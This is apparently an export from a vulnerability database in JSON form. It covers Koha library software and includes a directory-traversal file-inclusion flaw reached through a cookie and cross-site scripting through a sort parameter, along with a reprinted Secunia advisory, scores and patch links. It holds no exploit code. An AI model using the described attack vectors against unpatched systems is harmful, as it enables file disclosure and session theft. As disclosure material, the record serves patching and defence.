            "id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003333"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-130"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4715"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm. LibLime Koha has a local file containing vulnerability. An attacker can exploit a vulnerability to gain sensitive information and execute arbitrary code in the context of a web server process, jeopardizing applications and computers. This may allow the attacker to compromise the application and computer; other attacks are also possible. \nKoha 3.4.x prior to 3.4.7 and 3.6.x prior to 3.6.1 are vulnerable. ----------------------------------------------------------------------\n\nSecunia is hiring!\n\nFind your next job here:\n\nhttp://secunia.com/company/jobs/\n\n----------------------------------------------------------------------\n\nTITLE:\nKoha \"KohaOpacLanguage\" Local File Inclusion Vulnerability\n\nSECUNIA ADVISORY ID:\nSA46980\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46980/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46980\n\nRELEASE DATE:\n2011-11-25\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46980/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46980/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46980\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED 
SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nAkin Tosunlar has discovered a vulnerability in Koha, which can be\nexploited by malicious people to disclose sensitive information. \n\nInput passed to the \"KohaOpacLanguage\" cookie value in\ncgi-bin/koha/mainpage.pl is not properly verified in\ncgi-bin/opac/opac-main.pl before being used to include files. \n\nThe vulnerability is confirmed in version 4.02.06. Other versions may\nalso be affected. \n\nSOLUTION:\nFixed in the GIT repository. \n\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nPROVIDED AND/OR DISCOVERED BY:\nAkin Tosunlar, Vigasis Labs\n\nORIGINAL ADVISORY:\nVigasis Labs:\nhttp://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. 
\n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-4715"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003333"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-5088"
      },
      {
        "db": "BID",
        "id": "50812"
      },
      {
        "db": "IVD",
        "id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
      },
      {
        "db": "PACKETSTORM",
        "id": "107287"
      }
    ],
    "trust": 2.7
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "50812",
        "trust": 3.1
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4715",
        "trust": 2.9
      },
      {
        "db": "SECUNIA",
        "id": "46980",
        "trust": 1.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "18153",
        "trust": 1.6
      },
      {
        "db": "OSVDB",
        "id": "77322",
        "trust": 1.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-5088",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-130",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003333",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-450",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "71478",
        "trust": 0.6
      },
      {
        "db": "IVD",
        "id": "BC1048B6-1F7D-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "107287",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-5088"
      },
      {
        "db": "BID",
        "id": "50812"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003333"
      },
      {
        "db": "PACKETSTORM",
        "id": "107287"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-450"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-130"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4715"
      }
    ]
  },
  "id": "VAR-201112-0305",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "IVD",
        "id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-5088"
      }
    ],
    "trust": 1.3804196000000002
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-5088"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:53:33.007000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "[#21464023] Security: arbitrary file inclusion",
        "trust": 0.8,
        "url": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm"
      },
      {
        "title": "Koha 3.6.1",
        "trust": 0.8,
        "url": "http://koha-community.org/koha-3-6-1/"
      },
      {
        "title": "Koha 3.4.7",
        "trust": 0.8,
        "url": "http://koha-community.org/koha-3-4-7/"
      },
      {
        "title": "koha-3.06.01",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=42015"
      },
      {
        "title": "koha-3.04.07",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=42014"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003333"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-130"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003333"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4715"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.8,
        "url": "http://www.securityfocus.com/bid/50812"
      },
      {
        "trust": 1.7,
        "url": "http://www.vigasis.com/en/?guncel_guvenlik=liblime%20koha%20%3c=%204.2%20local%20file%20inclusion%20vulnerability\u0026lnk=exploits/18153"
      },
      {
        "trust": 1.6,
        "url": "https://github.com/liblime/liblime-koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#c4/output.pm"
      },
      {
        "trust": 1.6,
        "url": "http://www.exploit-db.com/exploits/18153"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/46980"
      },
      {
        "trust": 1.6,
        "url": "http://osvdb.org/77322"
      },
      {
        "trust": 1.6,
        "url": "http://koha-community.org/koha-3-6-1/#more-2929"
      },
      {
        "trust": 1.6,
        "url": "http://koha-community.org/koha-3-4-7/#more-2971"
      },
      {
        "trust": 1.0,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71478"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4715"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4715"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/71478"
      },
      {
        "trust": 0.3,
        "url": "http://koha-community.org/"
      },
      {
        "trust": 0.3,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=6629"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46980"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/company/jobs/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_intelligence/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/46980/#comments"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/personal/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/46980/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-5088"
      },
      {
        "db": "BID",
        "id": "50812"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003333"
      },
      {
        "db": "PACKETSTORM",
        "id": "107287"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-450"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-130"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4715"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "IVD",
        "id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-5088"
      },
      {
        "db": "BID",
        "id": "50812"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003333"
      },
      {
        "db": "PACKETSTORM",
        "id": "107287"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-450"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-130"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4715"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-11-28T00:00:00",
        "db": "IVD",
        "id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2011-11-28T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-5088"
      },
      {
        "date": "2011-11-24T00:00:00",
        "db": "BID",
        "id": "50812"
      },
      {
        "date": "2011-12-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-003333"
      },
      {
        "date": "2011-11-26T01:20:36",
        "db": "PACKETSTORM",
        "id": "107287"
      },
      {
        "date": "1900-01-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201111-450"
      },
      {
        "date": "2011-12-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201112-130"
      },
      {
        "date": "2011-12-08T19:55:08.187000",
        "db": "NVD",
        "id": "CVE-2011-4715"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-11-28T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-5088"
      },
      {
        "date": "2011-12-20T21:59:00",
        "db": "BID",
        "id": "50812"
      },
      {
        "date": "2011-12-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-003333"
      },
      {
        "date": "2011-11-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201111-450"
      },
      {
        "date": "2011-12-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201112-130"
      },
      {
        "date": "2024-11-21T01:32:50.897000",
        "db": "NVD",
        "id": "CVE-2011-4715"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-450"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-130"
      }
    ],
    "trust": 1.2
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Koha and  LibLime Koha Vulnerable to directory traversal",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003333"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Path traversal",
    "sources": [
      {
        "db": "IVD",
        "id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-130"
      }
    ],
    "trust": 0.8
  }
}

var-201501-0066
Vulnerability from variot

Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl. Koha is the first open source library automation system. There are multiple cross-site scripting vulnerabilities in Koha. Because the program fails to properly filter user-supplied input, an attacker could exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201501-0066",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "koha",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "koha",
        "version": "3.18.1"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "koha",
        "version": "3.18.0"
      },
      {
        "model": "koha",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.16.05"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.18.x"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.18.2"
      },
      {
        "model": "library software community koha",
        "scope": null,
        "trust": 0.6,
        "vendor": "koha",
        "version": null
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.16.05"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "koha",
        "version": "*"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "koha",
        "version": "3.18.0"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "koha",
        "version": "3.18.1"
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "ad18394a-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-09234"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007487"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-537"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9446"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:koha:koha",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007487"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Chris Cormack",
    "sources": [
      {
        "db": "BID",
        "id": "71803"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-537"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2014-9446",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2014-9446",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2014-09234",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "ad18394a-2351-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.9 [IVD]"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2014-9446",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2014-9446",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2014-09234",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201412-537",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "IVD",
            "id": "ad18394a-2351-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "ad18394a-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-09234"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007487"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-537"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9446"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl. Koha is the first open source library automation system. There are multiple cross-site scripting vulnerabilities in Koha. Because the program fails to properly filter user-supplied input, an attacker could exploit these vulnerabilities to execute arbitrary script code in the context of a browser that is not known to the affected user. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-9446"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007487"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-09234"
      },
      {
        "db": "BID",
        "id": "71803"
      },
      {
        "db": "IVD",
        "id": "ad18394a-2351-11e6-abef-000c29c66e3d"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-9446",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "71803",
        "trust": 2.5
      },
      {
        "db": "SECUNIA",
        "id": "61187",
        "trust": 1.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-09234",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-537",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007487",
        "trust": 0.8
      },
      {
        "db": "IVD",
        "id": "AD18394A-2351-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "ad18394a-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-09234"
      },
      {
        "db": "BID",
        "id": "71803"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007487"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-537"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9446"
      }
    ]
  },
  "id": "VAR-201501-0066",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "IVD",
        "id": "ad18394a-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-09234"
      }
    ],
    "trust": 1.3804196000000002
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "ad18394a-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-09234"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:18:27.739000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug 13425",
        "trust": 0.8,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
      },
      {
        "title": "Koha 3.16.6 Release",
        "trust": 0.8,
        "url": "http://koha-community.org/koha-3-16-6-release/"
      },
      {
        "title": "Koha 3.18.2 Release",
        "trust": 0.8,
        "url": "http://koha-community.org/koha-3-18-2-release/"
      },
      {
        "title": "Koha has multiple patches for cross-site scripting vulnerabilities",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/53350"
      },
      {
        "title": "koha-3.16.06",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=53165"
      },
      {
        "title": "koha-3.18.02",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=53166"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-09234"
